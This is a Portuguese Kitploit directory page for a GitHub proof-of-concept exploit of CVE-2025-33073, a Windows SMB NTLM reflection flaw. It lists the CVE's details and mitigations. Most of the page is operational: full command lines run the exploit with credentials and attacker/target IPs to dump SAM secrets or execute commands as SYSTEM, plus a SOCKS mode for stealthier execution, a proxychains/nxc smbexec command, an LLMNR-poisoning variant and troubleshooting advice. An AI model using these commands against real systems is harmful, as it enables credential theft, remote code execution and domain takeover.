Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Análise de VulnerabilidadesExploraçãoMovimento LateralTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

Ver Repositório
16há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

✨ CVE-2025-33073: Vulnerabilidade de RCE no Windows SMB 🚨

🔥 Execução Remota de Código Autenticada de Alta Gravidade 🔥 Controle de Acesso Incorreto no Cliente SMB do Windows (CWE-284)


🛡️ Principais Detalhes em Resumo

Baixar ferramenta
AspectoDetalhes
Pontuação CVSS v3.18.8 (Alta) 🔥
Sistemas AfetadosWindows 10, 11, Server 2012–2025 (todas as edições) 💻
Data de Divulgação10 de junho de 2025 📅 (Corrigido na Patch Tuesday de junho de 2025)
ExploraçãoAtivamente explorado em ambientes reais 😱
Adicionado ao CISA KEV em 21 de outubro de 2025
Vetor de AtaqueRede (Autenticado) 🌐
ImpactoExecução de código em nível de SYSTEM 👑
Movimento lateral via relay Kerberos
ContornoMitigações de reflexão NTLM ⚡

🛠️ Mitigações Imediatas

  1. Atualize agora! 🔧
    → Aplique as atualizações da Microsoft (ex.: KB5060998)
    → Guia de Atualização da Microsoft 🔗

  2. Habilite a Assinatura SMB ✍️
    → Imponha em todos os clientes e servidores
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. Restrinja o NTLM 🚫
    → Bloqueie NTLM quando possível
    → Monitore tentativas de relay com ferramentas EDR

  4. Correção automatizada? 🤖
    → Use Vicarius vRx ou scripts personalizados para remediação em massa


⚠️ Por Que Isso Importa

  • Contorna as proteções tradicionais de NTLM 🛑
  • Funciona mesmo com assinatura SMB não imposta
  • Permite assunção total do domínio em ambientes AD mal configurados 🏰

Status em 15 de novembro de 2025:
✅ Corrigido
❌ Ainda explorado em sistemas sem atualização
🔔 Prazo CISA: 10 de novembro de 2025 ⏰


⚠️ Exemplo de uso

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Comando personalizado Em vez de executar secretsdump, um comando personalizado pode ser executado.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS Para execução mais furtiva de comandos após uma conexão válida como SYSTEM ter sido estabelecida. --target e --target-ip devem ser iguais aqui.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

Um comando personalizado também pode ser executado via proxychains em vez de despejar o SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Exploração manual sem requisito de DNS

Se você estiver no mesmo domínio de broadcast que o dispositivo e ele estiver vulnerável a envenenamento LLMNR, é possível explorar um dispositivo sem precisar registrar um registro DNS.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Solução de problemas:

  • Às vezes o ataque não funciona porque o hostname é usado para o ataque, o que resulta em uma consulta DNS a partir do Kali. Se o Kali não estiver usando o servidor DNS ou você receber uma mensagem '/ FAILED' do impacket-ntlmrelayx, tente adicionar o host ao seu arquivo /etc/hosts. Isso deve fazer o ataque funcionar.

  • Se usar IP, o ataque deve funcionar. Às vezes, executá-lo várias vezes resulta em SUCCESS em vez de falha. Até agora não está perfeitamente claro por que isso acontece. Acho que tem algo a ver com rede.

  • Tente outro método de coerção usando -M ou --method.


Wireshark:

A autenticação NTLM local ocorre

455252866-0a3fe643-2d52-427a-91f2-991770732f62

A autenticação NTLM local não ocorre, resultando em uma tentativa FAILED

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Vale a pena saber:

  • O xterm permite copiar e colar com o botão do meio do mouse.
  • O registro DNS também deve ser conhecido pelo cliente; isso pode levar mais tempo em algumas ocasiões. Com mais tempo quero dizer: aguarde alguns minutos.
  • Isto é apenas uma PoC, o que significa que não foram feitas tentativas de contornar AV/EDR. Use por sua conta e risco.

Não espere — atualize hoje! 🛑
A segurança da sua rede depende disso. 💪